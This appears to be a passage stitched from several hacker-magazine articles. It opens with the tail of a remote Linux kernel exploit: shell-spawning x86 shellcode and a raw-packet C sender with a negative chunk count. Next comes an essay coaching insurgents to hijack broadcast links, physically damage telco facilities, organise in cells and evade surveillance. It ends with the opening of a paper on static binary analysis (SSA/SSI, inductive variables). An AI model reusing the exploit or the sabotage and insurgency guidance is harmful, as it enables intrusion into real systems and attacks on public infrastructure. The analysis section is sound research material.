  "\x57"                         // push   edi
  "\x89\xe1"                     // mov    ecx, esp
  "\x43"                         // inc    ebx
  "\xb0\x66"                     // mov    al, 102
  "\xcd\x80"                     // int    80h
  "\x89\xd9"                     // mov    ecx, ebx
  "\x89\xc3"                     // mov    ebx, eax
  "\xb0\x3f"                     // mov    al, 63
  "\x49"                         // dec    ecx
  "\xcd\x80"                     // int    80h
  "\x41"                         // inc    ecx
  "\xe2\xf8"                     // loop   lp
  "\x51"                         // push   ecx
  "\x68\x6e\x2f\x73\x68"         // push   dword 68732f6eh
  "\x68\x2f\x2f\x62\x69"         // push   dword 69622f2fh
  "\x89\xe3"                     // mov    ebx, esp
  "\x51"                         // push   ecx
  "\x53"                         // push   ebx
  "\x89\xe1"                     // mov    ecx, esp
  "\xb0\xf4"                     // mov    al, 244
  "\xf6\xd0"                     // not    al
  "\xcd\x80"                     // int    80h
  "\x22"                         // border stage-3 end
  "\xbb";                        // border stage-2 end

/* end of shellcode */


struct twsk_chunk
{
  int type;
  char buff[12];
};


struct twsk
{
  int chunk_num;
  struct twsk_chunk chunk[0];
};


void fatal_perror(const char *issue)
{
  perror(issue);        /* print the caller's message, not a literal */
  exit(1);
}


void fatal(const char *issue)
{
  fprintf(stderr, "%s\n", issue);
  exit(1);
}


/* packet IP checksum */
unsigned short csum(unsigned short *buf, int nwords)
{
  unsigned long sum;

  for(sum=0; nwords>0; nwords--)
    sum += *buf++;
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  return ~sum;
}

void prepare_packet(char *buffer)
{
  unsigned char *ptr = (unsigned char *)buffer;
  unsigned int i;
  unsigned int left;

  left = TWSK_PACKET_LEN - sizeof(struct twsk) - sizeof(struct iphdr);
  left -= SIZE_JMP;
  left -= sizeof(shellcode)-1;

  ptr += (sizeof(struct twsk)+sizeof(struct iphdr));

  memset(ptr, 0x00, TWSK_PACKET_LEN);
  memcpy(ptr, shellcode, sizeof(shellcode)-1); /* shellcode must be 4
                                                  bytes aligned */
  ptr += sizeof(shellcode)-1;

  for(i=1; i < left/4; i++, ptr+=4)
    *((unsigned int *)ptr) = DEFAULT_VSYSCALL_RET;

  *((unsigned int *)ptr) = DEFAULT_VSYSCALL_JMP;
  ptr+=4;

  printf("buffer=%p, ptr=%p\n", buffer, ptr);
  strcpy((char *)ptr, JUMP); /* jmp -500 */
}


int main(int argc, char *argv[])
{
  int sock;
  struct sockaddr_in sin;
  int one = 1;
  const int *val = &one;

  printf("shellcode size: %zu\n", sizeof(shellcode));
  char *buffer = malloc(TWSK_PACKET_LEN);
  if(!buffer)
    fatal_perror("malloc");

  prepare_packet(buffer);

  struct iphdr *ip = (struct iphdr *) buffer;
  struct twsk *twsk = (struct twsk *) (buffer + sizeof(struct iphdr));

  if(argc < 2)
  {
    printf("Usage: ./sendtwsk ip");
    exit(-1);
  }

  sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (sock < 0)
    fatal_perror("socket");

  sin.sin_family = AF_INET;
  sin.sin_port = htons(12345);
  sin.sin_addr.s_addr = inet_addr(argv[1]);

  /* ip packet */
  ip->ihl = 5;
  ip->version = 4;
  ip->tos = 16;
  ip->tot_len = TWSK_PACKET_LEN;
  ip->id = htons(12345);
  ip->ttl = 64;
  ip->protocol = TWSK_PROTO;
  ip->saddr = inet_addr("192.168.200.1");
  ip->daddr = inet_addr(argv[1]);

  twsk->chunk_num = NEGATIVE_CHUNK_NUM;

  ip->check = csum((unsigned short *) buffer, TWSK_PACKET_LEN);

  if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, val, sizeof(one)) < 0)
    fatal_perror("setsockopt");

  if (sendto(sock, buffer, ip->tot_len, 0, (struct sockaddr *) &sin,
             sizeof(sin)) < 0)
    fatal_perror("sendto");

  return 0;
}


------[ 4 - Final words


The remote exploiting discussion ends this paper. We have presented
different scenarios and different exploiting techniques and 'notes' that we
hope you'll find somehow useful. This paper was a sort of sum up of the
more general approaches we took in those years of 'kernel exploiting'.


As we said at the start of the paper, the kernel is a big and large beast,
which offers many different points of 'attack' and which has more severe
constraints than userland exploiting. It is also 'relatively new', and
improvements (and new bugs, logical or not) keep coming out.

At the same time new countermeasures come out to make our 'exploiting
life' harder and harder.


The first draft of this paper was done some months ago, so we apologize if
some of the information presented here is outdated (or already
presented somewhere else and not properly referenced). We've tried to add
a couple of comments around the text to point out the most important
recent changes.


So, this is the end, time remains just for some greets. Thank you for
reading so far, we hope you enjoyed the whole work.


A last minute shoutout goes to the bitsec guys, who gave a cool talk
about kernel exploiting at the BlackHat conference [24]. Go check their
paper/exploits for examples and coverage of *BSD and Windows systems.


Greetz and thanks go, in random order, to 


sgrakkyu: darklady(:*), HTB, risk (Arxlab), recidjvo (for netfilter 
tricks), vecna (for being vecna:)). 


twiz: lmbdwr, ga, sd, karl, cmn, christer, koba, smaster, #dnerds & 
#elfdev people for discussions, corrections, feedbacks and just long 
‘evening/late night’ talks. 

A last shoutout to akira, sanka, metal_militia and yhly for making the
monday evening a _great_ evening [and for all the beers offered :-) ].


The Revolution will be on YouTube
By Gladio 


Gladio@phrack.org 


Forget everything you know about revolutions. It’s all wrong. 


Fighting a conventional war in an industrialized nation is suicide. Even 
if you could field a military force capable of defeating the government 
forces, the wreckage wouldn’t be worth having. Think about mortar shells 
landing in chemical plants. Massive toxic waste spills. Poisonous clouds 
drifting with the winds. Fighting a war in your own backyard is just 
plain stupid. Notice how the super-powers fight each other with proxy 
wars in other countries. 


Sure it might be fun to form a militia and go play army with your friends 
in Idaho. Got some full-auto assault rifles? Maybe even mortars, heavy 
machine guns and some anti-aircraft guns? 


Think they can take out an AC-130 lobbing artillery shells from 12 miles
away? A flight of A-10s spitting depleted uranium shells the size of your
fist at a rate that makes the cannon sound like a redlined dirt bike? A
shooting war with a modern government is a shortcut to obliteration.


Most coups are accomplished (or thwarted) by skillful manipulation of 
information. There have been a number of countries where tyrants (and 
legitimate leaders) have been overthrown by very small groups using mass 
communications effectively. 


The typical method involves blocking all (or most) information sources
controlled by the government, and supplying an alternative that delivers
your message. Usually, you just announce the change in government, tell
everyone they are safe and impose a curfew for a short time to consolidate
your control. Announce that the country, the police and the military are
under your control, and keep repeating it. Saturate the airwaves with your
message, while preventing any contradictory messages from propagating.


Virtually all broadcast media use the telephone network to deliver content 
from their studios to their transmitters. Networks use satellites and 
pstn to distribute content to local stations, which then use pstn to 
deliver it to the transmitter site. 


Hijacking these phone connections accomplishes both goals, of denying the 
‘official’ media access, and putting your own message out. 


In cases where you can’t hijack the transmitters, dropping the pstn 

will be effective. Police and military also use pstn to connect dispatch 
centers with transmitter towers. Recently, many have installed wireless 
(microwave) fallback systems. 


Physically shutting down the pstn just prior to your broadcasts may be 
very effective. This is most easily accomplished by physical damage to 

the telco facilities, but there are also non-physical technical means to 
do this on a broad scale. Spelling them out here would only result in the 
holes being closed, but if you have people with the skill set to do this, 
it is preferable to physical means because you will have the advantage 

of utilizing these communications resources as your plan progresses. 


Leveraging the Internet


Most of the FUD produced about insurgence and the internet is focused on
"taking down" the internet. That's probably not the most effective use
of technical assets. An insurgency would benefit more from utilizing the
net. One use is mass communications. Get your message out to the masses
and recruit new members.


Another use is for communications within your group. This is where things 
get sticky. Most governments have the ability to monitor and intercept 
their citizen’s internet traffic. The governments most deserving of 
being overthrown are probably also the most effective at electronic 
surveillance. 


The gov will also infiltrate your group, so forums aren’t going to 

be the best means of communicating strategies and tactics. Forums can 
be useful for broad discussions, such as mission statements, goals and 
recruiting. Be wary of traffic analysis and sniffing. TOR can be useful, 
particularly if your server is accessible only on TOR network. 


Encryption is your best friend, but can also be your worst enemy. Keep 
in mind that encryption only buys you time. A good, solid cipher will 
not likely be read in real time by your opponent, but will eventually 
be cracked. The important factor here is that it not be cracked until 
it’s too late to be useful. 


A one time pad (OTP) is the best way to go. Generate random data and 
write it to 2, and only 2, DVDs. Physically transport the DVDs to each 
communications endpoint. Never let them out of your direct control. Do 
not mail them. Do not send keys over ssh or ssl. Physically hand the DVD 
to your counterpart on the other end. Never re-use a portion of the key. 


Below is a good way to utilize your OTP:


Generate a good OTP (K), come up with a suspicious alternate message
(M), and knowing your secret text (P), you calculate (where "+" is mod
26 addition):


   K'  = M + K
   K'' = P + K
   C   = K' + P


Lock up K'' in a safety deposit box, and hide K' in some other off
site, secure location. Keep C around with big "beware of Crypto systems"
signs. When the rubber hose is broken out, take at least 2 good lickings,
and then give up the key to the safety deposit box. They get K'',
and calculate


   C - K'' = M


thus giving them the bogus message, and protecting your real text.
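

The mod 26 arithmetic behind this can be checked with a few lines of C.
The sketch assumes that the ciphertext is formed as C = K' + P (the text
does not spell out how C is built, so that definition is an assumption),
and that every string is uppercase A-Z and of the same length. Function
names and sample strings are ours.

```c
#include <stddef.h>
#include <string.h>

/* out = a + b (mod 26), letter by letter; inputs are uppercase A-Z. */
static void add26(const char *a, const char *b, char *out)
{
    size_t n = strlen(a);
    for (size_t i = 0; i < n; i++)
        out[i] = (char)('A' + ((a[i] - 'A') + (b[i] - 'A')) % 26);
    out[n] = '\0';
}

/* out = a - b (mod 26), letter by letter; inputs are uppercase A-Z. */
static void sub26(const char *a, const char *b, char *out)
{
    size_t n = strlen(a);
    for (size_t i = 0; i < n; i++)
        out[i] = (char)('A' + ((a[i] - 'A') - (b[i] - 'A') + 26) % 26);
    out[n] = '\0';
}

/*
 * Derive both keys and the ciphertext from pad k, decoy m and real
 * text p. All buffers must hold strlen(k) + 1 bytes.
 */
static void make_keys(const char *k, const char *m, const char *p,
                      char *k1, char *k2, char *c)
{
    add26(m, k, k1);    /* K'  = M + K  */
    add26(p, k, k2);    /* K'' = P + K  */
    add26(k1, p, c);    /* C   = K' + P (assumed definition) */
}
```

With these definitions sub26(c, k2, out) yields the decoy M, while
sub26(c, k1, out) yields the real text P, whatever pad is used.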


Operational Security 


The classic "cellular" configuration is the most secure against 
infiltration and compromise. A typical cell should have no more than 5-10 
members. One leader, 2 members who each know how to contact one member 

of an ‘upstream’ cell, and 2 members who each know how to contact one 
member of a downstream cell. Nobody, including the leader, should know 
how to contact more than one person outside of their own cell. 


Never use your real name, and never use your organizational alias in 
any other context. 


Electronic communications between members should be kept to a
minimum. When it is necessary, it should only be conducted via the OTP
cipher. Preferably, these communications should consist of not much more
than arranging a physical meeting. Meet at a pre-arranged place, and
then go to another, un-announced place where surveillance is difficult,
to discuss operational matters.


Do not carry a phone. Even a phone which is switched off can be 
tracked, and most can be used to eavesdrop on discussions even when 
powered down. Removing the battery is only marginally safer, because 
tracking/listening gear can be built into the battery pack. If you find 
yourself stuck with a phone during a meeting, remove the battery and 
place both the phone and battery in a metal box and remove it from the 
immediate area of conversation. 


It never hurts to generate some bogus traffic. Gibberish, random data, 
innocuous stories etc., all serve to generate noise in which to better 
hide your real communications. 


Steganography can be useful when combined with solid crypto. Encrypt and 
stego small messages into something like a full length movie avi, and 
distribute it to many people via a torrent. Only your intended recipient 
will have the key to decrypt the stegged message. Be sure to stego some 
purely random noise into other movies, and torrent them as well. 


Hopefully you'll find this document useful as a starting point for
further discussion and refinement. It's not meant to be definitive, and
is surely not comprehensive. Feel free to copy, add, edit or change as
you see fit. Please do add more relevant to your area(s) of expertise.


Software has bugs. That is quite a known fact.


[ I. Introduction


In this article, we will discuss the design of an engine for automated
vulnerability analysis of binary programs. The source code of the
Chevarista static analyzer is given at the end of this document.


The purpose of this paper is not to disclose 0day vulnerabilities, but
to understand how it is possible to find them without (or with
restricted) human intervention. However, we will not kindly provide
the results of our automated auditing on predefined binaries : instead
we will always take generic examples of the most common difficulties
encountered when auditing such programs. Our goal is to enlighten the
underground community about writing your own static analyzer and not
to be profitable for security companies or any profit oriented
organization.


Instead of going straight to the results of the proposed implementation,
we will introduce the domain of program analysis, without going deeply
into the theory (which can get very formal), but taking the perspective
of a hacker who is tired of focusing on a specific exploit problem
and wants to investigate to what extent it is possible to automatically
find vulnerabilities and generate exploit code for them without
human intervention.


Chevarista hasn't reached its goal of being this completely automated
tool, however it shows the path to implementing such a tool incrementally,
with a genericity that makes it capable of finding any definable kind
of vulnerability.


Detecting all the vulnerabilities of a given program can be
intractable, and this for many reasons. The first reason is that
we cannot predict whether a program running forever will ever have
a bug or not. The second reason is that if this program ever stops,
the number of states (as in "memory contexts") it reached and passed
through before stopping is very big, and testing all of the possible
concrete program paths would either take your whole life, or a dedicated
big cluster of machines working on this for you for ages.
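

To put a rough number on that, here is a small C sketch. It assumes the
simplest possible model, a program with n independent two-way branches
(so 2^n concrete paths), and a made-up exploration rate; real programs
with loops are worse. The function names are ours.

```c
#include <stdint.h>

/* Number of concrete paths through n independent two-way branches.
 * Saturates at UINT64_MAX once the count no longer fits in 64 bits. */
static uint64_t path_count(unsigned branches)
{
    if (branches >= 64)
        return UINT64_MAX;
    return (uint64_t)1 << branches;
}

/* Years needed to walk every path at the given (assumed) rate. */
static double years_to_explore(unsigned branches, double paths_per_second)
{
    const double seconds_per_year = 365.0 * 24.0 * 3600.0;
    double paths = 1.0;

    for (unsigned i = 0; i < branches; i++)
        paths *= 2.0;                 /* 2^branches as a double */

    return paths / paths_per_second / seconds_per_year;
}
```

Ten branches give only 1024 paths, but years_to_explore(64, 1e9), that is
64 branches at a billion paths per second, already comes to roughly 585
years.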


As we need more automated systems to find bugs for us, and we do not
have such computational power, we need to be clever about what has to be
analysed and how generically we can reason about programs, so that a
single small analyzer can reason about a lot of different kinds of bugs.
After all, if the effort is not worth the genericity, it's probably better
to audit code manually, which would be more productive. However, automated
systems are not limited to vulnerability finding : because of their tight
relation with the analyzed program, they can also find the exact
conditions in which a bug happens, and what context must be reached to
trigger it.


But someone could interject : "But is not Fuzzing supposed to do
that already ?". My answer would be : Yes. But static analysis is
the intelligence inside Fuzzing. Fuzz testing programs gives very
good results, but any good fuzzer needs to be designed with major static
analysis orientations. This article also applies somewhat to fuzzing,
but the proposed implementation of the Chevarista analyzer is not
a fuzzer. The first reason is that Chevarista does not execute the
program to analyze it. Instead, it acts like a (de)compiler but
performs analysis instead of translating (back) to assembly (or source)
code. It is thus much more performant than fuzzing, but it requires a lot
of development and literature review to arrive at the complete
automatic tool that every hacker dreams of maintaining.


Another lost guy will add : "Your stuff looks more or less like an
exploitation framework, it's not so new". Exploitation frameworks
are indeed not very new stuff. None of them analyzes for vulnerabilities,
and they actually only work if the builtin exploits are good enough. When
the framework aims at letting you trigger exploits manually, then it
is not an automated framework anymore. This is why Chevarista is not
CORE-Impact or Metasploit : it's an analyzer that finds bugs in programs
and tells you where they are.


One more fat guy in the end of the room will be threatening: "It is simply
not possible to find vulnerabilities in code without the source .." and
then a lot of people will stand up and declare this as a prophecy,
because it's already sufficiently hard to do it on source code anyway.
I would simply temper this judgement by several remarks: for some
people, assembly code -is- source code, thus having the assembly is
like having the source, without a certain amount of information. It
is this amount of lost information that we need to recover when writing
a decompiler.


First, we do not have the names of variables, but naming variables in a
different way does not affect the result of a vulnerability analysis.
Second, we do not have the types, but data types in compiled C programs
do not really enforce properties about the variables values (because of
C casts or a compiler lacking strong type checking). The only real
information that is enforced is about variable size in memory, which is
recoverable from an assembly program most of the time. This is not as
true for C++ programs (or other programs written in higher level
object-oriented or functional languages), but in this article we will
mostly focus on compiled C programs.


A widespread opinion about program analysis is that it is harder to
achieve on a low-level (imperative) language than on a high-level
(imperative) language. This is true and false, and we need to bring more
precision to this statement. Specifically, we want to compare the
analysis of C code and the analysis of assembly code:


Available information         C code            Assembly code
---------------------------------------------------------------
Original variables names      Yes (explicit)    No
Original types names          Yes (explicit)    No
Control Sequentiality         Yes (explicit)    Yes (explicit)
Structured control            Yes (explicit)    Yes (recoverable)
Data dependencies             Yes (implicit)    Yes (implicit)
Data Types                    Yes (explicit)    Yes (recoverable)
Register transfers            No                Yes (explicit)
Selected instructions         No                Yes (explicit)


Let's discuss those points in more detail:


- The control sequentiality is obviously kept in the assembly, else
the processor would not know how to execute the binary program.
However the binary program does not contain a clearly structured
tree of execution. Conditionals, and especially loops, do not appear
as such in the executable code. We need a preliminary analysis for
structuring the control flow graph. This was done already on source
and binary code using different algorithms that we do not present
in this article.


- Data dependencies are not explicit even in the source program, however
we can compute them precisely both in the source code and the binary code.
The dataflow analysis in the binary code however is slightly different,
because it contains every single load and store between registers and
the memory, not only at the level of variables, as done in the source
program. Because of this, assembly programs contain more instructions
than source programs contain statements. This is an advantage and a
disadvantage at the same time. It is an advantage because we can track
the flow in a much more fine-grained fashion at the machine level, and
that is what is necessary especially for all kinds of optimizations,
or machine-specific bugs that rely on a certain variable being either
in the memory or in a register, etc. This is a disadvantage because we
need more memory to analyse such bigger program listings.


- Data types are explicit in the source program. Types are probably the
hardest information to recover from binary code. However this has been
done already, and the approach we present in this paper is definitely
compatible with existing work on type-based decompilation. Data types
are much harder to recover when dealing with real objects (like classes
in compiled C++ programs). We will not deal with the problem of
recovering object classes in this article, as we focus on memory
related vulnerabilities.


- Register level anomalies can happen [DLB], which can be useful for a
hacker to determine how to create a context of registers or memory when
writing exploits. Binary-level code analysis has the advantage of
providing a tighter approach to exploit generation on real world existing
targets.


- Instruction level information is interesting, again, to make sure we
don't miss bugs from the compiler itself. It is academically very well
respected to code a certified compiler which proves the semantic
equivalence between source code and compiled code, but from the hacker
point of view, it does not mean so much. Concrete use in the wild means
concrete code, means assembly. Additionally, it is rarer, but some
irregularities have already been witnessed in the processor's execution
of specific patterns of instructions, so an instruction level analyzer
can deal with those, but a source level analyzer cannot. A last reason I
would mention is that the source code of a project is very verbose. If a
code analyzer is embedded into some important device, either the source
code of the software inside the device will not be available, or the
device will lack storage or communication bandwidth to keep an
accessible copy of the source code. Binary code analyzers do not have
this dependency on source code and can thus be used in a wider scope.


To sum up, there is a lot of information recovery work before starting to
perform the source-like level analysis. However, the only information
that is not available after recovery is not mandatory for analysing
code : the names of types and variables do not affect the
execution of a program. We will abstract those away from our analysis
and use our own naming scheme, as presented in the next chapter of this
article.


[ II. Preparation 


We have to come back to the first wishes and try to understand better what
vulnerabilities are, how we can detect them automatically, and whether
we are really capable of generating exploits from analyzing a program
that we do not even execute. The answer is yes and no and we need to make
things clear about this. The answer is yes, because if you know exactly
how to characterize a bug, and if this bug is detectable by any
algorithm, then we can code a program that will reason only about
those known-in-advance vulnerability specificities and convert the
raw assembly (or source) code into an intermediate form that will make
clear where the specificities happen, so that the "signature" of the
vulnerability can be found if it is present in the program. The answer
is no, because given an unknown vulnerability, we do not know in
advance the specificities that characterize its signature. It
means that we somewhat have to take an approximate signature and
check the program, but the result might be an over-approximation (a
lot of false positives) or an under-approximation (finds nothing or
little, while vulnerabilities exist without being detected).

Fuzzing and black-box testing are dynamic analyses. The core of
our analyzer is not, but it can find an interest in running the
program for a different purpose than a fuzzer. Fuzzers try their
chance on a randomly crafted input. They do not have any *inner*
knowledge of the program they analyze. This is a major issue because
the dynamic analyzer that is a fuzzer cannot optimize or refine
its inputs depending on events that are unobservable for it. A fuzzer
can as well be coupled with a tracer [AD] or a debugger, so that fuzzing
is guided by the debugger knowledge about internal memory states and
variable values during the execution of the program.


Nevertheless, the real concept of a code analysis tool must be an integrated
solution, to avoid losing even more performance when using an external
debugger (like gdb, which is awfully slow when using ptrace). Our
technique of analysis is capable of taking decisions depending on
internal states of a program even without executing it. However, our
representation of a state is abstract : we do not compute the whole
content of the real memory state at each step of execution, but consider
only the meaningful information about the behavior of the program, by
automatically letting the analyzer annotate the code with qualifiers
such as : "The next instruction will perform a memory allocation" or
"Register R or memory cell M will contain a pointer on a dynamically
allocated memory region". We will explain in more detail heap related
properties checking in the type-state analysis paragraph of Part III.


In this part of the paper, we will describe a family of intermediate forms
which bridge the gap between code analysis on a structured code, and code
analysis on an unstructured (assembly) code. Conversion to those intermediate
forms can be done from binary code (like in an analyzing decompiler) or from
source code (like in an analyzing compiler). In this article, we will
transform binary code into a program written in an intermediate form, and then
perform all the analysis on this intermediate form. All the studied properties
will be related to dataflow analysis. No structured control flow is necessary
to perform those: a simple control flow graph (or even a list of basic blocks
with xrefs) can be the starting point of such analysis.


Let's be more concrete and illustrate how we can analyze the internal states
of a program without executing it. We start with a very basic piece of code:


Stub 1

                  o              o  : internal state
if (a)           / \
  b++;          o   o            /\ : control-flow splitting
else             \ /             \/ : control-flow merging
  c--;            o


In this simplistic example, we represent the program as a graph whose
nodes are states and edges are control flow dependencies. What is an internal
state ? If we want to use all the information of each line of code,
we need to make it an object remembering which variables are used and modified
(including status flags of the processor). Then, each of those control states
performs certain operations before jumping to another part of the code
(represented by the internal states for the if() or else() code stubs). Once
the if/else code is finished, both paths merge into a unique state, which is
the state after having executed the conditional statement. Depending on how
abstract the analysis is, the internal program states will track more or less
of the requested information at each computation step. For example, one must
differentiate a control-flow analysis (like in the previous example), and a
dataflow analysis.
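
The notion of internal state can be sketched in a few lines of Python. This
is only an illustration: the dictionary layout and the node names (test, then,
else, merge) are assumptions made for this sketch, not the data structures of
Chevarista. Each node of Stub 1 remembers the variables it uses and modifies,
and the splitting and merging points are found by counting successors and
predecessors.

```python
# Hypothetical encoding of Stub 1: one internal state per node, recording
# the variables it uses and modifies, plus its control-flow successors.
cfg = {
    "test":  {"uses": {"a"}, "mods": set(), "succ": ["then", "else"]},
    "then":  {"uses": {"b"}, "mods": {"b"}, "succ": ["merge"]},
    "else":  {"uses": {"c"}, "mods": {"c"}, "succ": ["merge"]},
    "merge": {"uses": set(), "mods": set(), "succ": []},
}


def predecessors(graph):
    """Invert the successor lists to get the predecessors of each node."""
    preds = {name: [] for name in graph}
    for name, node in graph.items():
        for succ in node["succ"]:
            preds[succ].append(name)
    return preds


def split_points(graph):
    """Nodes with more than one successor: control-flow splitting."""
    return sorted(n for n, node in graph.items() if len(node["succ"]) > 1)


def merge_points(graph):
    """Nodes with more than one predecessor: control-flow merging."""
    preds = predecessors(graph)
    return sorted(n for n in graph if len(preds[n]) > 1)


print(split_points(cfg), merge_points(cfg))
```

A real analyzer would attach much more to each state (status flags, abstract
values), but the shape of the graph is the same.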


Imagine this piece of code: 


Stub 2

c = 21;
b = a;
a = 42;
if (b != c)
  a++;
else
  a--;
c += a;

[Figure: control-flow graph and data-flow graph with predicates of Stub 2]

In a dataflow graph, the nodes are the variables, and the arrows are the
dependences between variables. The control-flow and data-flow graphs
provide complementary information. One only cares about the sequentiality
in the graph, the other one cares about the dependences between the variables
without apparently enforcing any order of evaluation. Adding predicates
to a dataflow graph helps at determining which nodes are involved in a
condition and which instance of the successor data nodes (in our case,
variable a in the if() or the else()) should be considered for our
analysis.


As you can see, even a simple data-flow graph with only a few variables
starts to get messy already. To clarify the representation of the
program we are working on, we need some kind of intermediate representation
that keeps the sequentiality of the control-flow graph, but also provides the
dependences of the data-flow graph, so we can reason on both of them
using a single structure. We can use some kind of "program dependence graph"
that would sum up both in a single graph. That is the graph we will consider
for the next examples of the article.


Some intermediate forms introduce special nodes in the data-flow graph, and
give well-recognizable types to those nodes. This is the case of the Phi() and
Sigma() nodes in the Static Single Assignment [SSA] and Static Single
Information [SSI] intermediate forms, and that indeed facilitates the reasoning
on the data-flow graph. Additionally, decomposing a single variable into
multiple "single assignments" (and multiple single uses too, in the SSI form),
that is, naming uniquely each occurrence of a given variable, helps at
disambiguating which instance of the variable we are talking about at a given
point of the program:


Stub 2 in SSA form          Stub 2 in SSI form

c1 = 21;                    c1 = 21;
b1 = a1;                    b1 = a1;
                            (a3, a4) = Sigma(a2);
if (b1 != c1)               if (b1 != c1)
  a2 = a1 + 1;                a3 = a2 + 1;
else                        else
  a3 = a1 - 1;                a4 = a2 - 1;
a4 = Phi(a2, a3);           a5 = Phi(a3, a4);
c2 = c1 + a4;               c2 = c1 + a5;

[Figure: data-flow graph in SSI form, with nodes a1, b1, c1,
 (a3, a4) = Sigma(a2), a3, a4 and a5 = Phi(a3, a4)]


Note that we have not put the predicates (condition tests) in that graph. In
practice, it is more convenient to have additional links in the graph for
predicates (that ease the testing of the predicate when walking on the graph),
but we have removed them just to clarify what SSA/SSI is about.
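
To make the "single assignment" naming more tangible, here is a minimal
Python sketch that renames straight-line assignments so that each name is
assigned only once. It is an illustration under strong assumptions: it only
handles a list of "x = expr" statements without branches, so it never has to
insert Phi() or Sigma() nodes, and the function name to_ssa is hypothetical.

```python
import re

IDENT = re.compile(r"[A-Za-z_]\w*")


def to_ssa(statements):
    """Rename straight-line 'x = expr' statements into single-assignment form."""
    version = {}   # current version number of each variable
    renamed = []

    def current(match):
        name = match.group(0)
        # A variable read before any assignment gets version 1 (like a1).
        if name not in version:
            version[name] = 1
        return f"{name}{version[name]}"

    for stmt in statements:
        target, expr = [part.strip() for part in stmt.split("=", 1)]
        rhs = IDENT.sub(current, expr)              # uses see the old versions
        version[target] = version.get(target, 0) + 1  # the definition gets a new one
        renamed.append(f"{target}{version[target]} = {rhs}")
    return renamed


print(to_ssa(["c = 21", "b = a", "a = 42", "c = c + a"]))
```

Handling the if/else of Stub 2 would additionally require placing a Phi()
at the merge point, which this sketch deliberately leaves out.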


Those "symbolic-choice functions" Phi() and Sigma() might sound a little bit
abstract. Indeed, they don't change the meaning of a program, but they capture
the information that a given data node has multiple successors (Sigma) or
ancestors (Phi). The curious reader is invited to look at the references for
more details about how to perform the intermediate translation. We will here
focus on the use of such representation, especially when analyzing code
with loops, like this one:


Stub 3 C code           Stub 3 in Labelled SSI form

int a = 42;             int a1 = 42;
int i = 0;              int i1 = 0;
                        P1 = [i1 < a1]
                        (<i4:Loop>, <i9:End>) = Sigma(P1,i2);
                        (<a4:Loop>, <a9:End>) = Sigma(P1,a2);

while (i < a)
{                    => Loop:
                        a3 = Phi(<BLoop:a1>, <BEnd:a5>);
                        i3 = Phi(<BLoop:i1>, <BEnd:i5>);

  a--;                  a5 = a4 - 1;
  i++;                  i5 = i4 + 1;
                        P2 = [i5 < a5]
                        (<a4:Loop>, <a9:End>) = Sigma(P2,a6);
                        (<i4:Loop>, <i9:End>) = Sigma(P2,i6);
}
                     => End:
                        a8 = Phi(<BLoop:a1>, <BEnd:a5>);
                        i8 = Phi(<BLoop:i1>, <BEnd:i5>);
a += i;                 a10 = a9 + i9;


By trying to condense this form a bit more (grouping the variables
under a unique Phi() or Sigma() at merge or split points of the control
flow graph), we obtain a smaller but equivalent program. This time,
the Sigma and Phi functions do not take a single variable list as parameter,
but a vector of lists (one list per variable):


Stub 3 in Factored & Labelled SSI form

int a1 = 42;
int i1 = 0;
P1 = [i1 < a1]

(<i4:Loop>, <i9:End>)               (i2)
(                   ) = Sigma(P1, (    ));
(<a4:Loop>, <a9:End>)               (a2)

Loop:

(a3)         (<BLoop:a1>, <BEnd:a5>)
(  ) = Phi (                         );
(i3)         (<BLoop:i1>, <BEnd:i5>)

a5 = a4 - 1;
i5 = i4 + 1;
P2 = [i5 < a5]

(<a4:Loop>, <a9:End>)               (a6)
(                   ) = Sigma(P2, (    ));
(<i4:Loop>, <i9:End>)               (i6)

End:

(a8)         (<BLoop:a1>, <BEnd:a5>)
(  ) = Phi (                         );
(i8)         (<BLoop:i1>, <BEnd:i5>)

a10 = a9 + i9;


How can we add information to this intermediate form ? Now the Phi()
and Sigma() functions allow us to reason about forward dataflow
(in the normal execution order, using Sigma) and backward dataflow
analysis (in the reverse order, using Phi). We can easily find the
inductive variables (variables that depend on themselves, like the
index or incrementing pointers in a loop), just using a simple analysis:


Let's consider the Sigma() before each Label, and try to iterate its
arguments:


    (<a4:Loop>, <a9:End>)               (a6)
    (                   ) = Sigma(P2, (    ));
    (<i4:Loop>, <i9:End>)               (i6)

    (<a5:Loop>, <a10:End>)
    (                    )
    (<i5:Loop>, <i10:End>)

    (<a6:Loop>, _|_)
    (              )
    (<i6:Loop>, _|_)


We take _|_ ("bottom") as a notation to say that a variable
does not have any more successors after a certain iteration
of the Sigma() function.


After some iterations (in that example, 2), we notice that
the left-hand side and the right-hand side are identical
for variables a and i. Indeed, both sides are written given
a6 and i6. In the mathematical jargon, that is what is called
a fixpoint (of a function F):

    F(X) = X

or in this precise example:

    a6 = Sigma(a6)


By doing that simple iteration-based analysis over our
symbolic functions, we are able to deduce in an automated
way which variables are inductive in loops. In our example,
both a and i are inductive. This is very useful as you can imagine,
since those variables become of special interest for us, especially
when looking for buffer overflows that might happen on buffers in
looping code.
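
The idea of iterating until nothing changes can be sketched in Python. Note
that this is not the Sigma() iteration itself but a simpler variant chosen for
illustration: it closes the "depends on" relation of the loop body until a
fixpoint is reached, and reports the variables that end up depending on
themselves. The input format and the extra variable t are assumptions of this
sketch.

```python
def inductive_variables(deps):
    """deps maps each variable assigned in the loop to the variables it reads.

    A variable is reported as inductive when it transitively depends on
    itself. The closure is computed by iterating until a fixpoint.
    """
    reach = {var: set(srcs) for var, srcs in deps.items()}
    changed = True
    while changed:                          # stop when F(X) = X
        changed = False
        for var in reach:
            extra = set()
            for src in reach[var]:
                extra |= reach.get(src, set())
            if not extra <= reach[var]:
                reach[var] |= extra
                changed = True
    return sorted(var for var in reach if var in reach[var])


# Loop body of Stub 3 (a--, i++), plus a hypothetical t = a + i
# that is recomputed at each iteration but never reads itself.
loop_body = {"a": {"a"}, "i": {"i"}, "t": {"a", "i"}}
print(inductive_variables(loop_body))
```

The closure also catches mutual dependencies (x computed from y and y from x),
which a purely syntactic check on a single statement would miss.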


We will now somewhat specialize this analysis in the following 
part of this article, by showing how this representation can 


apply to 


[ III. Analysis 


The previous part of the article introduced various notions
in program analysis. We might not use all the formalism in the rest
of this article, and focus on concrete examples. However, keep in
mind that from now on we reason on the intermediate form of
programs. This intermediate form is suitable for both source code
and binary code, but we will keep on staying at binary level for our
examples, proposing the translation to C only for understanding
purposes. Until now, we have shown how to understand data-flow analysis
and how to find inductive variables from the (source or binary) code of
the program.


So what are the steps to find vulnerabilities now ? 


A first intuition is that there is no generic definition for a
